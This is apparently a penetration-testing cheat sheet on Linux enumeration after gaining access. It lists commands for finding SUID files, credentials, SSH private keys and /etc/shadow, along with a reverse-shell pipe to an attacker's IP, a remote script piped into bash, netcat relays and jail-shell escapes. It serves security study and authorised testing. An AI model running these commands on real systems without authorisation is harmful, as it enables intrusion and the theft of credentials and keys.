Enumeration

Hack Responsibly.

Always ensure you have explicit permission to access any computer system before using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here.

TODO: (issue #13)

Integrate "Questions to Ask" into existing sections
Add descriptions (Keep/expand questions? Or rewrite?)
Clean up
Prep code examples for scripting
Split debian/redhat/BSD commands into "tabs"

Filesystem Enumeration

Find all files a specific user has access to:

find / -user $username -ls 2>/dev/null

Find all files a specific group has access to:

find / -group $groupname -ls 2>/dev/null

Search bash history for passwords (pwd search)

find . -name .bash_history -exec grep -A 1 '^passwd' {} \;

Search filesystem by name pattern

find / -name "$pattern" 2>/dev/null

Search files in whole filesystem for a string (case insensitive)

grep -ri "$string" / 2>/dev/null

Check for useful installed programs

only displays the ones currently installed

which awk perl python ruby gcc cc vi vim nmap find netcat nc wget tftp ftp 2>/dev/null

Find UID 0 files (root execution)

/usr/bin/find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \\\\; 2>/dev/null

Find executable files updated in August

find / -executable -type f 2> /dev/null | egrep -v "^/bin|^/var|^/etc|^/usr" | xargs ls -lh | grep Aug

Find a specific file

find /. -name suid\\\*\\

Find symlinked files

find -L / -samefile $file

Display all the strings in a file

strings $file

Determine the type of a file

file $file

Find deleted (unlinked) files

lsof +L1

Read extended attributes of a file

lsattr $file

Normally, using this command on a directory will cause it to list the attributes of the files inside that directory. However, you can force lsattr to treat a directory as a file and produce file attribute information for it by using the -d command line option.

lsattr -d /home/user

Change attributes of a file

chattr $file

The format of a symbolic mode is +-=[aAcCdDeijsStTu]
The operator '+' causes the selected attributes to be added to the existing attributes of the files; '-' causes them to be removed; and '=' causes them to be the only attributes that the files have.
The letters 'aAcCdDeijsStTu' select the new attributes for the files: append only (a), no atime updates (A), compressed (c), no copy-on-write (C), no dump (d), synchronous directory updates (D), extent format (e), immutable (i), data journalling (j), secure deletion (s), synchronous updates (S), no tail-merging (t), top of directory hierarchy (T), and undeletable (u).
The following attributes are read-only and may be listed by lsattr but not modified by chattr: compression error (E), huge file (h), indexed directory (I), inline data (N), compression raw access (X), and compressed dirty file (Z).
Not all flags are supported or utilized by all filesystems; refer to filesystem-specific man pages such as btrfs, ext4, and xfs for more filesystem-specific details.

Process Enumeration

ps

# To list every process on the system:
ps aux

# To list a process tree
ps axjf

# To list every process owned by $user:
ps -au$user

# To list every process with a user-defined format:
ps -eo pid,user,command

# List the processes being run by a particular set of usernames
ps -f -u username1, username2, .... ,usernameN 

# Display a list of processes with a particular parent ID (5589)
# Note that when a process is launched it may spawn several other sub processes which all share a common parent process ID
ps -f -ppid 5589

# List processes with given PIDs
ps -f -p 25001, 4567, 789

# Display all processes owned by the current user
ps -U $USER

# Sort processes based on CPU and memory usage (useful for finding memory leaks)
ps aux --sort pmem

Pspy

https://github.com/DominicBreuker/pspy

You can run pspy --help to learn about the flags and their meaning. The summary is as follows:

-p: enables printing commands to stdout (enabled by default)
-f: enables printing file system events to stdout (disabled by default)
-r: list of directories to watch with Inotify. pspy will watch all subdirectories recursively (by default, watches /usr, /tmp, /etc, /home, /var, and /opt).
-d: list of directories to watch with Inotify. pspy will watch these directories only, not the subdirectories (empty by default).
-i: interval in milliseconds between procfs scans. pspy scans regularly for new processes regardless of Inotify events, just in case some events are not received.
-c: print commands in different colors. File system events are not colored anymore, commands have different colors based on process UID.
--debug: prints verbose error messages which are otherwise hidden.

The default settings should be fine for most applications. Watching files inside /usr is most important since many tools will access libraries inside it.

Some more complex examples:

# print both commands and file system events and scan procfs every 1000 ms (=1sec)
./pspy64 -pf -i 1000 

# place watchers recursively in two directories and non-recursively into a third
./pspy64 -r /path/to/first/recursive/dir -r /path/to/second/recursive/dir -d /path/to/the/non-recursive/dir

# disable printing discovered commands but enable file system events
./pspy64 -p=false -f

/proc

enumerate info about current processes running from: /proc/self/status

ps -U root -u root ux View all processes started by a certain user (root in this case)

Simple enumeration script

#!/bin/sh
echo [+] Distribution and kernel version
cat /etc/issue
uname -a

echo [+] Mounted filesystems
mount -l

echo [+] Network configuration
ip -a
cat /etc/hosts
arp

echo [+] Development tools availability
which gcc
which g++
which python
which python3

echo [+] Installed packages (Debian systems only)
dpkg -l

echo [+] Services
netstat -tulnpe

echo [+] Processes
ps -aux

echo [+] Scheduled jobs
find /etc/cron* -ls 2>/dev/null
find /var/spool/cron* -ls 2>/dev/null

echo [+] Readable files in /etc 
find /etc -user `id -u` -perm -u=r \
 -o -group `id -g` -perm -g=r \
 -o -perm -o=r \
 -ls 2>/dev/null 

echo [+] SUID and GUID writable files
find / -o -group `id -g` -perm -g=w -perm -u=s \
 -o -perm -o=w -perm -u=s \
 -o -perm -o=w -perm -g=s \
 -ls 2>/dev/null 

echo [+] SUID and GUID files
find / -type f -perm -u=s -o -type f -perm -g=s \
 -ls 2>/dev/null

echo [+] Writable files outside HOME
mount -l find / -path “$HOME” -prune -o -path “/proc” -prune -o \( ! -type l \) \( -user `id -u` -perm -u=w  -o -group `id -g` -perm -g=w  -o -perm -o=w \) -ls 2>/dev/null

Misc

Linux Privilege Checker

full linux enumeration:

Download and execute script (such as LinEnum.sh) [from remote host]: curl $url/LinEnum.sh | bash

Locate exploits:

searchsploit $keyword 

#to pull exploit code:
searchsploit -x $exploit_num

enumeration multi-tool: Sparta (does nmap, hydra, nikto, sqlscan, ssl...)

Semi-automated enumeration all-in-one (use this!): nmapAutomator

Unix hardening tool that can be used for enumeration: Bastille

Questions to ask:

TODO: Split debian/redhat/BSD commands up into tabs; Clean up code for scripting ($var, etc) (issue #13)

Operating System

What's the distribution type? What version?

cat /etc/issue
cat /etc/*-release
cat /etc/lsb-release
cat /etc/redhat-release

What's the Kernel version? Is it 32 or 64-bit?

cat /proc/version   
uname -a
uname -mrs 
rpm -q kernel 
dmesg | grep Linux
ls /boot | grep vmlinuz-

What can be learnt from the environmental variables?

cat /etc/profile
cat /etc/bashrc
cat ~/.bash_profile
cat ~/.bashrc
cat ~/.bash_logout
env
set

Is there a printer?

lpstat -a

Applications & Services

What services are running? Which service has which user privilege?

ps aux
ps -ef
top
cat /etc/service

Which service(s) are been running by root? Of these services, which are vulnerable - it's worth a double check!

ps aux | grep root
ps -ef | grep root

What applications are installed? What version are they? Are they currently running?

ls -alh /usr/bin/
ls -alh /sbin/
dpkg -l
rpm -qa
ls -alh /var/cache/apt/archivesO
ls -alh /var/cache/yum/

Any of the service(s) settings misconfigured? Are any (vulnerable) plugins attached?

cat /etc/syslog.conf 
cat /etc/chttp.conf
cat /etc/lighttpd.conf
cat /etc/cups/cupsd.conf 
cat /etc/inetd.conf 
cat /etc/apache2/apache2.conf
cat /etc/my.conf
cat /etc/httpd/conf/httpd.conf
cat /opt/lampp/etc/httpd.conf
ls -aRl /etc/ | awk '$1 ~ /^.*r.*/

What jobs are scheduled?

crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root

Any plain text usernames and/or passwords?

grep -i user [filename]
grep -i pass [filename]
grep -C 5 "password" [filename]
find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password"   # Joomla

Communications & Networking

What NIC(s) does the system have? Is it connected to another network?

/sbin/ifconfig -a
cat /etc/network/interfaces
cat /etc/sysconfig/network

What are the network configuration settings? What can you find out about this network? DHCP server? DNS server? Gateway?

cat /etc/resolv.conf
cat /etc/sysconfig/network
cat /etc/networks
iptables -L
hostname
dnsdomainname

What other users & hosts are communicating with the system?

lsof -i 
lsof -i :80
grep 80 /etc/services
netstat -antup
netstat -antpx
netstat -tulpn
chkconfig --list
chkconfig --list | grep 3:on
last
w

What's cached? IP and/or MAC addresses

arp -e
route
/sbin/route -nee

Is packet sniffing possible? What can be seen? Listen to live traffic

# tcpdump tcp dst [ip] [port] and tcp dst [ip] [port]
tcpdump tcp dst 192.168.1.7 80 and tcp dst 10.2.2.222 21

Have you got a shell? Can you interact with the system?

http://lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/

nc -lvp 4444    # Attacker. Input (Commands)
nc -lvp 4445    # Attacker. Ouput (Results)
telnet [atackers ip] 44444 | /bin/sh | [local ip] 44445    # On the targets system. Use the attackers IP!

Is port forwarding possible? Redirect and interact with traffic from another view

rinetd - http://www.howtoforge.com/port-forwarding-with-rinetd-on-debian-etch
fpipe

# FPipe.exe -l [local port] -r [remote port] -s [local port] [local IP]
FPipe.exe -l 80 -r 80 -s 80 192.168.1.7

# ssh -[L/R] [local port]:[remote ip]:[remote port] [local user]@[local ip]
ssh -L 8080:127.0.0.1:80 root@192.168.1.7    # Local Port
ssh -R 8080:127.0.0.1:80 root@192.168.1.7    # Remote Port

mknod backpipe

# mknod backpipe p ; nc -l -p [remote port] < backpipe  | nc [local IP] [local port] >backpipe
mknod backpipe p ; nc -l -p 8080 < backpipe | nc 10.1.1.251 80 >backpipe    # Port Relay
mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow 1>backpipe    # Proxy (Port 80 to 8080)
mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow & 1>backpipe    # Proxy monitor (Port 80 to 8080)

Is tunneling possible? Send commands from local machine to remote

ssh -D 127.0.0.1:9050 -N $username@$ip 
proxychains ifconfig

Confidential Information & Users

Who are you? Who is logged in? Who has been logged in? Who else is there? Who can do what?

id
who
w
last 
cat /etc/passwd | cut -d:    # List of users
grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}'   # List of super users
awk -F: '($3 == "0") {print}' /etc/passwd   # List of super users
cat /etc/sudoers
sudo -l

What sensitive files can be read?

cat /etc/passwd
cat /etc/group
cat /etc/shadow
ls -alh /var/mail/

#bsd
cat /etc/master.passwd 
#is where password hashes are stored in BSD, not /etc/shadow

Anything "interesting" in the home directory(s)? If it's possible to access

ls -ahlR /root/
ls -ahlR /home/

Are there any passwords in; scripts, databases, configuration files or log files? Default paths and locations for passwords

cat /var/apache2/config.inc
cat /var/lib/mysql/mysql/user.MYD 
cat /root/anaconda-ks.cfg

What has the user been doing? Are there any passwords in plain text? What have they been editing?

ls -la ~
cat ~/.bash_history
#check for other shells as well (zsh, etc.)

cat ~/.nano_history
#check for other exitors as well (vim, etc.)

cat ~/.atftp_history
cat ~/.mysql_history 
cat ~/.php_history

What user information can be found?

cat ~/.bashrc
# check for other shells as well (zsh, etc.)

cat ~/.profile
cat /var/mail/root
cat /var/spool/mail/root

Can private-key information be found?

ls -la ~/.ssh
ls -la /etc/ssh

cat ~/.ssh/authorized_keys
cat ~/.ssh/identity.pub
cat ~/.ssh/identity
cat ~/.ssh/id_rsa.pub
cat ~/.ssh/id_rsa
cat ~/.ssh/id_dsa.pub
cat ~/.ssh/id_dsa
cat /etc/ssh/ssh_config
cat /etc/ssh/sshd_config
cat /etc/ssh/ssh_host_dsa_key.pub
cat /etc/ssh/ssh_host_dsa_key
cat /etc/ssh/ssh_host_rsa_key.pub
cat /etc/ssh/ssh_host_rsa_key
cat /etc/ssh/ssh_host_key.pub
cat /etc/ssh/ssh_host_key

File Systems

Which configuration files can be written in /etc? Are you able to reconfigure services?

ls -aRl /etc/ | awk '$1 ~ /^.*w.*/' 2>/dev/null     # Anyone
ls -aRl /etc/ | awk '$1 ~ /^..w/' 2>/dev/null        # Owner
ls -aRl /etc/ | awk '$1 ~ /^.....w/' 2>/dev/null    # Group
ls -aRl /etc/ | awk '$1 ~ /w.$/' 2>/dev/null          # Other

find /etc/ -readable -type f 2>/dev/null                         # Anyone
find /etc/ -readable -type f -maxdepth 1 2>/dev/null   # Anyone

What can be found in /var ?

ls -alh /var/log
ls -alh /var/mail
ls -alh /var/spool
ls -alh /var/spool/lpd 
ls -alh /var/lib/pgsql
ls -alh /var/lib/mysql
cat /var/lib/dhcp3/dhclient.leases

Any settings/files related to web server? Any settings file with database information?

ls -alhR /var/www/
ls -alhR /srv/www/htdocs/ 
ls -alhR /usr/local/www/apache22/data/
ls -alhR /opt/lampp/htdocs/ 
ls -alhR /var/www/html/

Is there anything in the log file(s) (Could help with "Local File Includes"!)

http://www.thegeekstuff.com/2011/08/linux-var-log-files/

cat /etc/httpd/logs/access_log
cat /etc/httpd/logs/access.log
cat /etc/httpd/logs/error_log
cat /etc/httpd/logs/error.log
cat /var/log/apache2/access_log
cat /var/log/apache2/access.log
cat /var/log/apache2/error_log
cat /var/log/apache2/error.log
cat /var/log/apache/access_log
cat /var/log/apache/access.log
cat /var/log/auth.log
cat /var/log/chttp.log
cat /var/log/cups/error_log
cat /var/log/dpkg.log
cat /var/log/faillog
cat /var/log/httpd/access_log
cat /var/log/httpd/access.log
cat /var/log/httpd/error_log
cat /var/log/httpd/error.log
cat /var/log/lastlog
cat /var/log/lighttpd/access.log
cat /var/log/lighttpd/error.log
cat /var/log/lighttpd/lighttpd.access.log
cat /var/log/lighttpd/lighttpd.error.log
cat /var/log/messages
cat /var/log/secure
cat /var/log/syslog
cat /var/log/wtmp
cat /var/log/xferlog
cat /var/log/yum.log
cat /var/run/utmp
cat /var/webmin/miniserv.log
cat /var/www/logs/access_log
cat /var/www/logs/access.log
ls -alh /var/lib/dhcp3/
ls -alh /var/log/postgresql/
ls -alh /var/log/proftpd/
ls -alh /var/log/samba/
# auth.log, boot, btmp, daemon.log, debug, dmesg, kern.log, mail.info, mail.log, mail.warn, messages, syslog, udev, wtmp

If commands are limited, can you break out of the "jail" shell?

python -c 'import pty;pty.spawn("/bin/bash")'
echo os.system('/bin/bash')
/bin/sh -i

How are file-systems mounted?

mount
df -h

Are there any unmounted file-systems?

cat /etc/fstab

What "Advanced Linux File Permissions" are used? "Sticky bit", SUID, GUID

find / -perm -1000 -type d 2>/dev/null    # Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here
find / -perm -g=s -type f 2>/dev/null    # SGID (chmod 2000) - run as the  group, not the user who started it.
find / -perm -u=s -type f 2>/dev/null    # SUID (chmod 4000) - run as the  owner, not the user who started it.

find / -perm -g=s -o -perm -u=s -type f 2>/dev/null    # SGID or SUID
for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done    # Looks in 'common' places: /bin, /sbin, /usr/bin, /usr/sbin, /usr/local/bin, /usr/local/sbin and any other *bin, for SGID or SUID (Quicker search)

# find starting at root (/), SGID or SUID, not Symbolic links, only 3 folders deep, list with more detail and hide any errors (e.g. permission denied)
find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null

Where can written to and executed from? A few 'common' places: /tmp, /var/tmp, /dev/shm

find / -writable -type d 2>/dev/null     # world-writeable folders
find / -perm -222 -type d 2>/dev/null    # world-writeable folders
find / -perm -o+w -type d 2>/dev/null    # world-writeable folders
find / -perm -o+x -type d 2>/dev/null    # world-executable folders

find / \( -perm -o+w -perm -o+x \) -type d 2>/dev/null   # world-writeable & executable folders

Any "problem" files? Word-writeable, "nobody" files

find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print   # world-writeable files
find /dir -xdev \( -nouser -o -nogroup \) -print   # No-owner files

Preparation for Writing Exploit Code

What development tools/languages are installed/supported?

find / -name perl*
find / -name python*
find / -name gcc* 
find / -name cc

How can files be transferred?

find / -name wget
find / -name curl
find / -name nc*
find / -name netcat*
find / -name tftp* 
find / -name ftp

Researching Vulnerabilities

Finding exploit code

References

https://howtoforge.com/linux-lsattr-command/

If you like this content and would like to see more, please consider buying me a coffee!

PreviousRed Team Notes NextGetting Access

Last updated 3 years ago